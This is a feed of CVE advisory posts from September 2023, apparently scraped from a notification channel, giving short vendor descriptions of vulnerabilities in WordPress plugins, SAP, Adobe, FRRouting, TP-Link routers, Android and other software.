🚨 CVE-2023-4501User authentication with username and password credentials is ineffective in OpenText (Micro Focus) Visual COBOL, COBOL Server, Enterprise Developer, and Enterprise Server (including product variants such as Enterprise Test Server), versions 7.0 patch updates 19 and 20, 8.0 patch updates 8 and 9, and 9.0 patch update 1, when LDAP-based authentication is used with certain configurations. When the vulnerability is active, authentication succeeds with any valid username, regardless of whether the password is correct; it may also succeed with an invalid username (and any password). This allows an attacker with access to the product to impersonate any user.Mitigations: The issue is corrected in the upcoming patch update for each affected product. Product overlays and workaround instructions are available through OpenText Support. The vulnerable configurations are believed to be uncommon.Administrators can test for the vulnerability in their installations by attempting to sign on to a Visual COBOL or Enterprise Server component such as ESCWA using a valid username and incorrect password.🎖@cveNotify |
|
| 2023-09-19 23:58:23 |
🚨 CVE-2023-40868Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.🎖@cveNotify |
|
| 2023-09-19 23:58:22 |
🚨 CVE-2023-3710Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).🎖@cveNotify |
|
| 2023-09-19 23:58:21 |
🚨 CVE-2023-26142All versions of the package crow are vulnerable to HTTP Response Splitting when untrusted user input is used to build header values. Header values are not properly sanitized against CRLF Injection in the set_header and add_header functions. An attacker can add the \r\n (carriage return line feeds) characters to end the HTTP response headers and inject malicious content.🎖@cveNotify |
|
| 2023-09-19 23:58:20 |
🚨 CVE-2023-3711Session Fixation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Session Credential Falsification through Prediction.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).🎖@cveNotify |
|
| 2023-09-19 23:58:18 |
🚨 CVE-2023-4893The Crayon Syntax Highlighter plugin for WordPress is vulnerable to Server Side Request Forgery via the 'crayon' shortcode in versions up to, and including, 2.8.4. This can allow authenticated attackers with contributor-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.🎖@cveNotify |
|
| 2023-09-19 23:58:17 |
🚨 CVE-2023-32665A flaw was found in GLib. GVariant deserialization is vulnerable to an exponential blowup issue where a crafted GVariant can cause excessive processing, leading to denial of service.🎖@cveNotify |
|
| 2023-09-19 23:58:16 |
🚨 CVE-2023-4972Improper Privilege Management vulnerability in Yepas Digital Yepas allows Collect Data as Provided by Users.This issue affects .🎖@cveNotify |
|
| 2023-09-19 23:58:15 |
🚨 CVE-2023-3712Files or Directories Accessible to External Parties vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Privilege Escalation.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).🎖@cveNotify |
|
| 2023-09-19 23:58:14 |
🚨 CVE-2023-38912SQL injection vulnerability in Super Store Finder PHP Script v.3.6 allows a remote attacker to execute arbitrary code via a crafted payload to the username parameter.🎖@cveNotify |
|
| 2023-09-19 23:58:13 |
🚨 CVE-2023-42362An arbitrary file upload vulnerability in Teller Web App v.4.4.0 allows a remote attacker to execute arbitrary commands and obtain sensitive information via uploading a crafted file.🎖@cveNotify |
|
| 2023-09-19 06:58:35 |
🚨 CVE-2022-28357NATS nats-server 2.2.0 through 2.7.4 allows directory traversal because of an unintended path to a management action from a management account.🎖@cveNotify |
|
| 2023-09-19 06:58:31 |
🚨 CVE-2023-41599An issue in the component /common/DownController.java of JFinalCMS v5.0.0 allows attackers to execute a directory traversal.🎖@cveNotify |
|
| 2023-09-19 06:58:30 |
🚨 CVE-2023-33831A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.🎖@cveNotify |
|
| 2023-09-19 06:58:29 |
🚨 CVE-2023-38255** UNSUPPPORTED WHEN ASSIGNED ** A potential attacker with or without (cookie theft) access to the device would be able to include malicious code (XSS) when uploading new device configuration that could affect the intended function of the device.🎖@cveNotify |
|
| 2023-09-19 06:58:28 |
🚨 CVE-2023-41084** UNSUPPPORTED WHEN ASSIGNED ** Session management within the web application is incorrect and allows attackers to steal session cookies to perform a multitude of actions that the web app allows on the device.🎖@cveNotify |
|
| 2023-09-19 06:58:24 |
🚨 CVE-2023-38582** UNSUPPPORTED WHEN ASSIGNED ** Persistent cross-site scripting (XSS) in the web application of MOD3GP-SY-120K allows an authenticated remote attacker to introduce arbitrary JavaScript by injecting an XSS payload into the field MAIL_RCV. When a legitimate user attempts to access to the vulnerable page of the web application, the XSS payload will be executed.🎖@cveNotify |
|
| 2023-09-19 06:58:23 |
🚨 CVE-2023-39039An information leak in Camp Style Project Line v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-09-19 06:58:22 |
🚨 CVE-2023-39043An information leak in YKC Tokushima_awayokocho Line v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-09-19 06:58:18 |
🚨 CVE-2023-39058An information leak in THE_B_members card v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-09-19 06:58:17 |
🚨 CVE-2023-39452** UNSUPPPORTED WHEN ASSIGNED ** The web application that owns the device clearly stores the credentials within the user management section. Obtaining this information can be done remotely due to the incorrect management of the sessions in the web application.🎖@cveNotify |
|
| 2023-09-19 06:58:16 |
🚨 CVE-2023-37611Cross Site Scripting (XSS) vulnerability in Neos CMS 8.3.3 allows a remote authenticated attacker to execute arbitrary code via a crafted SVG file to the neos/management/media component.🎖@cveNotify |
|
| 2023-09-19 06:58:15 |
🚨 CVE-2023-42446Pow is a authentication and user management solution for Phoenix and Plug-based apps. Starting in version 1.0.14 and prior to version 1.0.34, use of `Pow.Store.Backend.MnesiaCache` is susceptible to session hijacking as expired keys are not being invalidated correctly on startup. A session may expire when all `Pow.Store.Backend.MnesiaCache` instances have been shut down for a period that is longer than a session's remaining TTL. Version 1.0.34 contains a patch for this issue. As a workaround, expired keys, including all expired sessions, can be manually invalidated.🎖@cveNotify |
|
| 2023-09-12 16:58:13 |
🚨 CVE-2023-2071Rockwell Automation FactoryTalk View Machine Edition on the PanelView Plus, improperly verifies user’s input, which allows unauthenticated attacker to achieve remote code executed via crafted malicious packets. The device has the functionality, through a CIP class, to execute exported functions from libraries. There is a routine that restricts it to execute specific functions from two dynamic link library files. By using a CIP class, an attacker can upload a self-made library to the device which allows the attacker to bypass the security check and execute any code written in the function.🎖@cveNotify |
|
| 2023-09-12 16:58:12 |
🚨 CVE-2023-40834OpenCart v4.0.2.2 is vulnerable to Brute Force Attack.🎖@cveNotify |
|
| 2023-09-12 14:58:32 |
🚨 CVE-2023-42472Due to insufficient file type validation, SAP BusinessObjects Business Intelligence Platform (Web Intelligence HTML interface) - version 420, allows a report creator to upload files from local system into the report over the network. When uploading the image file, an authenticated attacker could intercept the request, modify the content type and the extension to read and modify sensitive data causing a high impact on confidentiality and integrity of the application.🎖@cveNotify |
|
| 2023-09-12 14:58:31 |
🚨 CVE-2023-4840The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'mappress' shortcode in versions up to, and including, 2.88.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-12 14:58:30 |
🚨 CVE-2023-4840The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'mappress' shortcode in versions up to, and including, 2.88.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-12 14:58:29 |
🚨 CVE-2023-4887The Google Maps Plugin by Intergeo for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'intergeo' shortcode in versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-12 14:58:25 |
🚨 CVE-2023-4887The Google Maps Plugin by Intergeo for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'intergeo' shortcode in versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-12 14:58:24 |
🚨 CVE-2023-4890The JQuery Accordion Menu Widget for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'dcwp-jquery-accordion' shortcode in versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-12 14:58:23 |
🚨 CVE-2023-4893The Crayon Syntax Highlighter plugin for WordPress is vulnerable to Server Side Request Forgery via the 'crayon' shortcode in versions up to, and including, 2.8.4. This can allow authenticated attackers with contributor-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.🎖@cveNotify |
|
| 2023-09-12 14:58:22 |
🚨 CVE-2023-40309SAP CommonCryptoLib does not perform necessary authentication checks, which may result in missing or wrong authorization checks for an authenticated user, resulting in escalation of privileges. Depending on the application and the level of privileges acquired, an attacker could abuse functionality restricted to a particular user group as well as read, modify or delete restricted data.🎖@cveNotify |
|
| 2023-09-12 14:58:19 |
🚨 CVE-2023-40622SAP BusinessObjects Business Intelligence Platform (Promotion Management) - versions 420, 430, under certain condition allows an authenticated attacker to view sensitive information which is otherwise restricted. On successful exploitation, the attacker can completely compromise the application causing high impact on confidentiality, integrity, and availability.🎖@cveNotify |
|
| 2023-09-12 14:58:18 |
🚨 CVE-2023-40623SAP BusinessObjects Suite Installer - version 420, 430, allows an attacker within the network to create a directory under temporary directory and link it to a directory with operating system files. On successful exploitation the attacker can delete all the operating system files causing a limited impact on integrity and completely compromising the availability of the system.🎖@cveNotify |
|
| 2023-09-12 14:58:17 |
🚨 CVE-2023-40624SAP NetWeaver AS ABAP (applications based on Unified Rendering) - versions SAP_UI 754, SAP_UI 755, SAP_UI 756, SAP_UI 757, SAP_UI 758, SAP_BASIS 702, SAP_BASIS 731, allows an attacker to inject JavaScript code that can be executed in the web-application. An attacker could thereby control the behavior of this web-application.🎖@cveNotify |
|
| 2023-09-12 14:58:13 |
🚨 CVE-2023-40625S4CORE (Manage Purchase Contracts App) - versions 102, 103, 104, 105, 106, 107, does not perform necessary authorization checks for an authenticated user. This could allow an attacker to perform unintended actions resulting in escalation of privileges which has low impact on confidentiality and integrity with no impact on availibility of the system.🎖@cveNotify |
|
| 2023-09-12 14:58:12 |
🚨 CVE-2022-4896Cyber Control, in its 1.650 version, is affected by a vulnerability in the generation on the server of pop-up windows with the messages "PNTMEDIDAS", "PEDIR", "HAYDISCOA" or "SPOOLER". A complete denial of service can be achieved by sending multiple requests simultaneously on a core.🎖@cveNotify |
|
| 2023-09-12 14:58:11 |
🚨 CVE-2023-26142All versions of the package crow are vulnerable to HTTP Response Splitting when untrusted user input is used to build header values. Header values are not properly sanitized against CRLF Injection in the set_header and add_header functions. An attacker can add the \r\n (carriage return line feeds) characters to end the HTTP response headers and inject malicious content.🎖@cveNotify |
|
| 2023-09-12 05:58:35 |
🚨 CVE-2023-4898Authentication Bypass by Primary Weakness in GitHub repository mintplex-labs/anything-llm prior to 0.0.1.🎖@cveNotify |
|
| 2023-09-12 05:58:34 |
🚨 CVE-2023-4899 SQL Injection in GitHub repository mintplex-labs/anything-llm prior to 0.0.1.🎖@cveNotify |
|
| 2023-09-12 05:58:33 |
🚨 CVE-2023-41064A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.6.9, macOS Big Sur 11.7.10, macOS Ventura 13.5.2, iOS 16.6.1 and iPadOS 16.6.1, iOS 15.7.9 and iPadOS 15.7.9. Processing a maliciously crafted image may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2023-09-12 05:58:32 |
🚨 CVE-2023-38802FRRouting FRR 7.5.1 through 9.0 and Pica8 PICOS 4.3.3.2 allow a remote attacker to cause a denial of service via a crafted BGP update with a corrupted attribute 23 (Tunnel Encapsulation).🎖@cveNotify |
|
| 2023-09-12 05:58:31 |
🚨 CVE-2023-41358An issue was discovered in FRRouting FRR through 9.0. bgpd/bgp_packet.c processes NLRIs if the attribute length is zero.🎖@cveNotify |
|
| 2023-09-12 05:58:27 |
🚨 CVE-2023-31490An issue found in Frrouting bgpd v.8.4.2 allows a remote attacker to cause a denial of service via the bgp_attr_psid_sub() function.🎖@cveNotify |
|
| 2023-09-12 05:58:26 |
🚨 CVE-2022-40318An issue was discovered in bgpd in FRRouting (FRR) through 8.4. By crafting a BGP OPEN message with an option of type 0xff (Extended Length from RFC 9072), attackers may cause a denial of service (assertion failure and daemon restart, or out-of-bounds read). This is possible because of inconsistent boundary checks that do not account for reading 3 bytes (instead of 2) in this 0xff case. NOTE: this behavior occurs in bgp_open_option_parse in the bgp_open.c file, a different location (with a different attack vector) relative to CVE-2022-40302.🎖@cveNotify |
|
| 2023-09-12 05:58:25 |
🚨 CVE-2022-43681An out-of-bounds read exists in the BGP daemon of FRRouting FRR through 8.4. When sending a malformed BGP OPEN message that ends with the option length octet (or the option length word, in case of an extended OPEN message), the FRR code reads of out of the bounds of the packet, throwing a SIGABRT signal and exiting. This results in a bgpd daemon restart, causing a Denial-of-Service condition.🎖@cveNotify |
|
| 2023-09-12 05:58:24 |
🚨 CVE-2022-36440A reachable assertion was found in Frrouting frr-bgpd 8.3.0 in the peek_for_as4_capability function. Attackers can maliciously construct BGP open packets and send them to BGP peers running frr-bgpd, resulting in DoS.🎖@cveNotify |
|
| 2023-09-12 05:58:20 |
🚨 CVE-2023-37759Incorrect access control in the User Registration page of Crypto Currency Tracker (CCT) before v9.5 allows unauthenticated attackers to register as an Admin account via a crafted POST request.🎖@cveNotify |
|
| 2023-09-12 05:58:19 |
🚨 CVE-2023-40353An issue was discovered in Exynos Mobile Processor 980 and 2100. An integer overflow at a buffer index can prevent the execution of requested services via a crafted application.🎖@cveNotify |
|
| 2023-09-12 05:58:18 |
🚨 CVE-2023-30908Potential security vulnerability have been identified in Hewlett Packard Enterprise OneView Software. This vulnerability could be remotely exploited to allow authentication bypass, disclosure of sensitive information, and denial of service.🎖@cveNotify |
|
| 2023-09-12 05:58:14 |
🚨 CVE-2023-39711Multiple cross-site scripting (XSS) vulnerabilities in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Subtotal and Paidbill parameters under the Add New Put section.🎖@cveNotify |
|
| 2023-09-12 05:58:13 |
🚨 CVE-2023-39422The /irmdata/api/ endpoints exposed by the IRM Next Generation booking engine authenticates requests using HMAC tokens. These tokens are however exposed in a JavaScript file loaded on the client side, thus rendering this extra safety mechanism useless.🎖@cveNotify |
|
| 2023-09-12 05:58:12 |
🚨 CVE-2023-39421The RDPWin.dll component as used in the IRM Next Generation booking engine includes a set of hardcoded API keys for third-party services such as Twilio and Vonage. These keys allow unrestricted interaction with these services.🎖@cveNotify |
|
| 2023-09-12 00:58:18 |
🚨 CVE-2023-39069An issue in StrangeBee TheHive v.5.0.8, v.4.1.21 and Cortex v.3.1.6 allows a remote attacker to gain privileges via Active Directory authentication mechanism.🎖@cveNotify |
|
| 2023-09-12 00:58:14 |
🚨 CVE-2023-41879Magento LTS is the official OpenMage LTS codebase. Guest orders may be viewed without authentication using a "guest-view" cookie which contains the order's "protect_code". This code is 6 hexadecimal characters which is arguably not enough to prevent a brute-force attack. Exposing each order would require a separate brute force attack. This issue has been patched in versions 19.5.1 and 20.1.1.🎖@cveNotify |
|
| 2023-09-12 00:58:13 |
🚨 CVE-2023-41640An improper error handling vulnerability in the component ErroreNonGestito.aspx of GruppoSCAI RealGimm 1.1.37p38 allows attackers to obtain sensitive technical information via a crafted SQL query.🎖@cveNotify |
|
| 2023-09-12 00:58:12 |
🚨 CVE-2021-39473Saibamen HotelManager v1.2 is vulnerable to Cross Site Scripting (XSS) due to improper sanitization of comment and contact fields.🎖@cveNotify |
|
| 2023-09-11 22:58:52 |
🚨 CVE-2023-35676In createQuickShareAction of SaveImageInBackgroundTask.java, there is a possible way to trigger a background activity launch due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-09-11 22:58:51 |
🚨 CVE-2023-35677In onCreate of DeviceAdminAdd.java, there is a possible way to forcibly add a device admin due to a missing permission check. This could lead to local denial of service (factory reset or continuous locking) with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-09-11 22:58:50 |
🚨 CVE-2023-35680In multiple locations, there is a possible way to import contacts belonging to other users due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-09-11 22:58:46 |
🚨 CVE-2023-35681In eatt_l2cap_reconfig_completed of eatt_impl.h, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-09-11 22:58:45 |
🚨 CVE-2023-35683In bindSelection of DatabaseUtils.java, there is a possible way to access files from other applications due to SQL injection. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-09-11 22:58:44 |
🚨 CVE-2023-35687In MtpPropertyValue of MtpProperty.h, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-09-11 22:58:40 |
🚨 CVE-2023-4897Relative Path Traversal in GitHub repository mintplex-labs/anything-llm prior to 0.0.1.🎖@cveNotify |
|
| 2023-09-11 22:58:39 |
🚨 CVE-2023-41933Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2023-09-11 22:58:38 |
🚨 CVE-2023-4270The Min Max Control WordPress plugin before 4.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2023-09-11 22:58:34 |
🚨 CVE-2023-2705The gAppointments WordPress plugin before 1.10.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against admin🎖@cveNotify |
|
| 2023-09-11 22:58:33 |
🚨 CVE-2023-38256Dover Fueling Solutions MAGLINK LX Web Console Configuration versions 2.5.1, 2.5.2, 2.5.3, 2.6.1, 2.11, 3.0, 3.2, and 3.3 vulnerable to a path traversal attack, which could allow an attacker to access files stored on the system.🎖@cveNotify |
|
| 2023-09-11 22:58:32 |
🚨 CVE-2023-3169The tagDiv Composer WordPress plugin before 4.2, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not have authorisation in a REST route and does not validate as well as escape some parameters when outputting them back, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-09-11 19:58:48 |
🚨 CVE-2023-4745A vulnerability was found in Beijing Baichuo Smart S45F Multi-Service Secure Gateway Intelligent Management Platform up to 20230822. It has been rated as critical. Affected by this issue is some unknown functionality of the file /importexport.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-238634 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-11 19:58:47 |
🚨 CVE-2023-41935Jenkins Azure AD Plugin 396.v86ce29279947 and earlier, except 378.380.v545b_1154b_3fb_, uses a non-constant time comparison function when checking whether the provided and expected CSRF protection nonce are equal, potentially allowing attackers to use statistical methods to obtain a valid nonce.🎖@cveNotify |
|
| 2023-09-11 19:58:46 |
🚨 CVE-2023-41937Jenkins Bitbucket Push and Pull Request Plugin 2.4.0 through 2.8.3 (both inclusive) trusts values provided in the webhook payload, including certain URLs, and uses configured Bitbucket credentials to connect to those URLs, allowing attackers to capture Bitbucket credentials stored in Jenkins by sending a crafted webhook payload.🎖@cveNotify |
|
| 2023-09-11 19:58:45 |
🚨 CVE-2023-41938A cross-site request forgery (CSRF) vulnerability in Jenkins Ivy Plugin 2.5 and earlier allows attackers to delete disabled modules.🎖@cveNotify |
|
| 2023-09-11 19:58:41 |
🚨 CVE-2023-41940Jenkins TAP Plugin 2.3 and earlier does not escape TAP file contents, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control TAP file contents.🎖@cveNotify |
|
| 2023-09-11 19:58:40 |
🚨 CVE-2023-35719ManageEngine ADSelfService Plus GINA Client Insufficient Verification of Data Authenticity Authentication Bypass Vulnerability. This vulnerability allows physically present attackers to execute arbitrary code on affected installations of ManageEngine ADSelfService Plus. Authentication is not required to exploit this vulnerability.The specific flaw exists within the Password Reset Portal used by the GINA client. The issue results from the lack of proper authentication of data received via HTTP. An attacker can leverage this vulnerability to bypass authentication and execute code in the context of SYSTEM. Was ZDI-CAN-17009.🎖@cveNotify |
|
| 2023-09-11 19:58:39 |
🚨 CVE-2023-4779The User Submitted Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [usp_gallery] shortcode in versions up to, and including, 20230811 due to insufficient input sanitization and output escaping on user supplied attributes like 'before'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-11 19:58:35 |
🚨 CVE-2023-40743** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** When integrating Apache Axis 1.x in an application, it may not have been obvious that looking up a service through "ServiceFactory.getService" allows potentially dangerous lookup mechanisms such as LDAP. When passing untrusted input to this API method, this could expose the application to DoS, SSRF and even attacks leading to RCE.As Axis 1 has been EOL we recommend you migrate to a different SOAP engine, such as Apache Axis 2/Java. As a workaround, you may review your code to verify no untrusted or unsanitized input is passed to "ServiceFactory.getService", or by applying the patch from https://github.com/apache/axis-axis1-java/commit/7e66753427466590d6def0125e448d2791723210 . The Apache Axis project does not expect to create an Axis 1.x release fixing this problem, though contributors that would like to work towards this are welcome.🎖@cveNotify |
|
| 2023-09-11 19:58:34 |
🚨 CVE-2023-28544Memory corruption in WLAN while sending transmit command from HLOS to UTF handlers.🎖@cveNotify |
|
| 2023-09-11 19:58:33 |
🚨 CVE-2023-28548Memory corruption in WLAN HAL while processing Tx/Rx commands from QDART.🎖@cveNotify |
|
| 2023-09-11 19:58:29 |
🚨 CVE-2023-28557Memory corruption in WLAN HAL while processing command parameters from untrusted WMI payload.🎖@cveNotify |
|
| 2023-09-11 19:58:28 |
🚨 CVE-2023-30058novel-plus 3.6.2 is vulnerable to SQL Injection.🎖@cveNotify |
|
| 2023-09-11 17:58:39 |
🚨 CVE-2021-44193Adobe After Effects versions 22.0 (and earlier) and 18.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-11 17:58:38 |
🚨 CVE-2021-44194Adobe After Effects versions 22.0 (and earlier) and 18.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-11 17:58:37 |
🚨 CVE-2021-40791Adobe Premiere Pro versions 22.0 (and earlier) and 15.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-11 17:58:36 |
🚨 CVE-2021-40795Adobe Premiere Pro versions 22.0 (and earlier) and 15.4.2 (and earlier) are affected by an out-of-bounds read vulnerability which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-11 17:58:33 |
🚨 CVE-2021-40790Adobe Premiere Pro versions 22.0 (and earlier) and 15.4.2 (and earlier) are affected by an Use-After-Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-11 17:58:32 |
🚨 CVE-2021-42265Adobe Premiere Pro versions 22.0 (and earlier) and 15.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-11 17:58:31 |
🚨 CVE-2021-43027Adobe After Effects versions 22.0 (and earlier) and 18.4.2 (and earlier) are affected by an out-of-bounds read vulnerability which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-11 17:58:30 |
🚨 CVE-2021-44189Adobe After Effects versions 22.0 (and earlier) and 18.4.2 (and earlier) are affected by an Use-After-Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-11 17:58:26 |
🚨 CVE-2021-44190Adobe After Effects versions 22.0 (and earlier) and 18.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-11 17:58:25 |
🚨 CVE-2021-44192Adobe After Effects versions 22.0 (and earlier) and 18.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-11 17:58:24 |
🚨 CVE-2023-39264By default, stack traces for errors were enabled, which resulted in the exposure of internal traces on REST API endpoints to users. This vulnerability exists in Apache Superset versions up to and including 2.1.0.🎖@cveNotify |
|
| 2023-09-11 17:58:20 |
🚨 CVE-2019-7819Adobe Acrobat Reader versions 2019.010.20098 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-11 17:58:19 |
🚨 CVE-2019-16470Adobe Acrobat Reader versions 2019.021.20056 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-11 17:58:18 |
🚨 CVE-2022-28832Adobe InDesign versions 17.1 (and earlier) and 16.4.1 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-11 14:58:32 |
🚨 CVE-2023-27523Improper data authorization check on Jinja templated queries in Apache Superset up to and including 2.1.0 allows for an authenticated user to issue queries on database tables they may not have access to.🎖@cveNotify |
|
| 2023-09-11 14:58:31 |
🚨 CVE-2023-4588File accessibility vulnerability in Delinea Secret Server, in its v10.9.000002 and v11.4.000002 versions. Exploitation of this vulnerability could allow an authenticated user with administrative privileges to create a backup file in the application's webroot directory, changing the default backup directory to the wwwroot folder, and download it with some configuration files such as encryption.config/ and database.config stored in the wwwroot directory, exposing the database credentials in plain text.🎖@cveNotify |
|
| 2023-09-11 14:58:30 |
🚨 CVE-2023-40357Multiple TP-LINK products allow a network-adjacent authenticated attacker to execute arbitrary OS commands. Affected products/versions are as follows: Archer AX50 firmware versions prior to 'Archer AX50(JP)_V1_230529', Archer A10 firmware versions prior to 'Archer A10(JP)_V2_230504', Archer AX10 firmware versions prior to 'Archer AX10(JP)_V1.2_230508', and Archer AX11000 firmware versions prior to 'Archer AX11000(JP)_V1_230523'.🎖@cveNotify |
|
| 2023-09-11 14:58:29 |
🚨 CVE-2023-40531Archer AX6000 firmware versions prior to 'Archer AX6000(JP)_V1_1.3.0 Build 20221208' allows a network-adjacent authenticated attacker to execute arbitrary OS commands.🎖@cveNotify |
|
| 2023-09-11 14:58:26 |
🚨 CVE-2023-39935Archer C5400 firmware versions prior to 'Archer C5400(JP)_V2_230506' allows a network-adjacent authenticated attacker to execute arbitrary OS commands.🎖@cveNotify |
|
| 2023-09-11 14:58:25 |
🚨 CVE-2023-39224Archer C5 firmware all versions and Archer C7 firmware versions prior to 'Archer C7(JP)_V2_230602' allow a network-adjacent authenticated attacker to execute arbitrary OS commands. Note that Archer C5 is no longer supported, therefore the update for this product is not provided.🎖@cveNotify |
|
| 2023-09-11 14:58:24 |
🚨 CVE-2023-38568Archer A10 firmware versions prior to 'Archer A10(JP)_V2_230504' allows a network-adjacent unauthenticated attacker to execute arbitrary OS commands.🎖@cveNotify |
